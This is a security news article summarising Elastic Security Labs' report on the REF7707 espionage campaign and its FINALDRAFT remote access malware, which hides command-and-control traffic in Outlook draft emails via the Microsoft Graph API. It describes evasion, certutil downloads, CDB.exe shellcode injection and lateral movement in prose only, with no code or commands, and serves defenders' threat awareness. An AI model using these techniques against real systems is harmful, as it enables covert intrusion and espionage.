REF7707 Hackers Target Windows & Linux Systems with FINALDRAFT Malware

Elastic Security Labs has uncovered a sophisticated cyber-espionage campaign, tracked as REF7707, targeting entities across South America and Southeast Asia.

Central to this operation is the deployment of a novel malware family named FINALDRAFT, which has been engineered to exploit both Windows and Linux systems.

The campaign highlights the increasing use of legitimate cloud services, such as Microsoft’s Graph API, for covert command-and-control (C2) communications.

Advanced Malware Leveraging Cross-Platform Capabilities

The REF7707 campaign was first identified in November 2024 during an investigation into a breach at a South American foreign ministry.

The attackers utilized FINALDRAFT alongside custom loaders like PATHLOADER and GUIDLOADER to execute encrypted shellcode and maintain persistence.

FINALDRAFT is a full-featured remote administration tool (RAT), written in C++, capable of process injection, file manipulation, and network proxying.

Its modular design allows for additional functionalities to be deployed dynamically.

A key feature of FINALDRAFT is its abuse of the Microsoft Graph API to communicate through Outlook’s draft email folder.

Commands are issued via email drafts created by attackers, while responses are stored as new drafts, bypassing traditional email monitoring systems.

This stealthy approach minimizes detection by blending malicious traffic with legitimate organizational activity.

The malware also boasts 37 command handlers and advanced evasion techniques, such as executing PowerShell commands without invoking “powershell.exe” and leveraging stolen NTLM hashes for lateral movement.

A Linux variant of FINALDRAFT has also been identified, featuring similar C2 capabilities and the ability to execute shell commands or self-delete from infected systems.

Operational Missteps Expose Infrastructure

Despite its technical sophistication, the REF7707 campaign exhibited operational security flaws that exposed additional adversary-owned infrastructure.

Attackers relied heavily on cloud services like Google Firebase and Pastebin for payload delivery and staging, further complicating detection efforts.

However, inconsistent evasion tactics revealed pre-production malware samples and other compromised systems.

The initial infection vector remains unclear, though attackers used Microsoft’s certutil application to download payloads from a compromised server.

They also employed Windows Remote Management’s Remote Shell plugin (WinrsHost.exe) for lateral movement within networks using stolen credentials.

Persistence was achieved through scheduled tasks that invoked renamed system binaries to load malicious configurations.

The malware leveraged legitimate tools like the Windows debugger (CDB.exe) to inject shellcode into processes such as mspaint.exe, further obscuring its activity.

FINALDRAFT’s use of legitimate services like Microsoft’s Graph API poses significant challenges for defenders relying on network-based intrusion detection systems.

Once communication is established, all traffic is routed through trusted infrastructure, making it nearly indistinguishable from normal organizational activity.

Elastic Security Labs emphasizes the need for robust defensive strategies to counter advanced threats like REF7707.

Organizations are encouraged to monitor endpoint behaviors closely and implement multi-layered security measures to detect anomalies in legitimate service usage.

This campaign underscores the growing sophistication of espionage-oriented cyber threats and the need for continuous vigilance in securing critical systems against emerging attack vectors.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free